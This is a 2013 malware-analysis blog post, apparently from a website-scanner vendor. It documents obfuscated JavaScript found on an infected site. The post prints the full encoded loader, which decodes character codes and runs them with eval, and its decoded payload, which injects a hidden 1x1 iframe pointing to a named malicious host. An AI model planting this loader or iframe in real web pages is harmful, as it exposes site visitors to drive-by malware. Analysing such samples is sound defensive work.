Thursday, August 22, 2013

JavaScript malware injecting malicious iframes in website pages

JavaScript malware on website injects hidden malicious iframes

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.

This infected website is based in Canada and it hosts suspicious JavaScript in files.
More about malicious iframes detected on websites can be found in other posts.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Wed Aug 21 15:56:29 2013
Infected website's files:  4 
Website malware scan report link: http://goo.gl/STQqcz

Online Website Malware Scanner
Quttera Online Website Malware Scanner screenshot

Threat dump:

Website Malware Scanner
JavaScript malware detected. Screenshot from file analysis.


Malware entry


Malware entry details.

Beautified script

  1. function bt4t34b() {
  2.     return n[i];
  3. };
  4. ww = window;
  5. ss = String.fromCharCode;
  6. try {
  7.     document.body = ~1
  8. } catch (qwrbtwt) {
  9.     whwej = 12;
  10. } {
  11.     try {
  12.         whwej = ~2;
  13.     } catch (agdsg) {
  14.         whwej = 0;
  15.     }
  16.     if (whwej) {
  17.         try {
  18.             document.body++;
  19.         } catch (bawetawe) {
  20.             if (ww.document) {
  21.                 n ="0x2d,0x6b,0x7a,0x73,0x68,0x79,0x6e,0x74,0x73,0x25,0x2d,0x2e,0x25,0x80,0x12,0xf,0x25,0x25,0x25,0x25,0x7b,0x66,0x77,0x25,0x6d,0x69,0x76,0x76,0x7c,0x25,0x42,0x25,0x69,0x74,0x68,0x7a,0x72,0x6a,0x73,0x79,0x33,0x68,0x77,0x6a,0x66,0x79,0x6a,0x4a,0x71,0x6a,0x72,0x6a,0x73,0x79,0x2d,0x2c,0x6e,0x6b,0x77,0x66,0x72,0x6a,0x2c,0x2e,0x40,0x12,0xf,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x77,0x68,0x25,0x42,0x25,0x2c,0x6d,0x79,0x79,0x75,0x3f,0x34,0x34,0x6b,0x79,0x75,0x33,0x6d,0x6a,0x77,0x6d,0x66,0x79,0x79,0x66,0x73,0x73,0x7e,0x68,0x33,0x68,0x74,0x72,0x34,0x68,0x74,0x7a,0x73,0x79,0x33,0x75,0x6d,0x75,0x2c,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x79,0x7e,0x71,0x6a,0x33,0x75,0x74,0x78,0x6e,0x79,0x6e,0x74,0x73,0x25,0x42,0x25,0x2c,0x66,0x67,0x78,0x74,0x71,0x7a,0x79,0x6a,0x2c,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x79,0x7e,0x71,0x6a,0x33,0x67,0x74,0x77,0x69,0x6a,0x77,0x25,0x42,0x25,0x2c,0x35,0x2c,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x79,0x7e,0x71,0x6a,0x33,0x6d,0x6a,0x6e,0x6c,0x6d,0x79,0x25,0x42,0x25,0x2c,0x36,0x75,0x7d,0x2c,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x79,0x7e,0x71,0x6a,0x33,0x7c,0x6e,0x69,0x79,0x6d,0x25,0x42,0x25,0x2c,0x36,0x75,0x7d,0x2c,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x79,0x7e,0x71,0x6a,0x33,0x71,0x6a,0x6b,0x79,0x25,0x42,0x25,0x2c,0x36,0x75,0x7d,0x2c,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x6d,0x69,0x76,0x76,0x7c,0x33,0x78,0x79,0x7e,0x71,0x6a,0x33,0x79,0x74,0x75,0x25,0x42,0x25,0x2c,0x36,0x75,0x7d,0x2c,0x40,0x12,0xf,0x12,0xf,0x25,0x25,0x25,0x25,0x6e,0x6b,0x25,0x2d,0x26,0x69,0x74,0x68,0x7a,0x72,0x6a,0x73,0x79,0x33,0x6c,0x6a,0x79,0x4a,0x71,0x6a,0x72,0x6a,0x73,0x79,0x47,0x7e,0x4e,0x69,0x2d,0x2c,0x6d,0x69,0x76,0x76,0x7c,0x2c,0x2e,0x2e,0x25,0x80,0x12,0xf,0x25,0x25,0x25,0x25,0x25,0x25,0x25,0x25,0x69,0x74,0x68,0x7a,0x72,0x6a,0x73,0x79,0x33,0x7c,0x77,0x6e,0x79,0x6a,0x2d,0x2c,0x41,0x69,0x6e,0x7b,0x25,0x6e,0x69,0x42,0x61,0x2c,0x6d,0x69,0x76,0x76,0x7c,0x61,0x2c,0x43,0x41,0x34,0x69,0x6e,0x7b,0x43,0x2c,0x2e,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x25,0x25,0x25,0x25,0x69,0x74,0x68,0x7a,0x72,0x6a,0x73,0x79,0x33,0x6c,0x6a,0x79,0x4a,0x71,0x6a,0x72,0x6a,0x73,0x79,0x47,0x7e,0x4e,0x69,0x2d,0x2c,0x6d,0x69,0x76,0x76,0x7c,0x2c,0x2e,0x33,0x66,0x75,0x75,0x6a,0x73,0x69,0x48,0x6d,0x6e,0x71,0x69,0x2d,0x6d,0x69,0x76,0x76,0x7c,0x2e,0x40,0x12,0xf,0x25,0x25,0x25,0x25,0x82,0x12,0xf,0x82,0x2e,0x2d,0x2e,0x40".split(",");
  22.                 h = 2;
  23.                 s = "";
  24.                 for (= 0; i - 499 != 0; i++) {
  25.                     k = i;
  26.                     s = s.concat(ss(eval(bt4t34b()) - 5));
  27.                 }
  28.                 z = s;
  29.                 eval("" + s);
  30.             }
  31.         }
  32.     }
  33. }

Malicious payload


Decoded payload generates hidden iframe to http://ftp.herhattannyc.com/count.php

  1. (function () {
  2.  
  3.     var hdqqw = document.createElement('iframe');
  4.  
  5.     hdqqw.src = 'http://ftp.herhattannyc.com/count.php';
  6.  
  7.     hdqqw.style.position = 'absolute';
  8.  
  9.     hdqqw.style.border = '0';
  10.  
  11.     hdqqw.style.height = '1px';
  12.  
  13.     hdqqw.style.width = '1px';
  14.  
  15.     hdqqw.style.left = '1px';
  16.  
  17.     hdqqw.style.top = '1px';
  18.  
  19.  
  20.  
  21.     if (!document.getElementById('hdqqw')) {
  22.  
  23.         document.write('<div id=\'hdqqw\'></div>');
  24.  
  25.         document.getElementById('hdqqw').appendChild(hdqqw);
  26.  
  27.     }
  28.  
  29. })();

Blacklisting status


The redirect URL is Malicious by on BitDefender and Fortinet as reported by VirusTotal.

VirusTotal report screenshot

Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.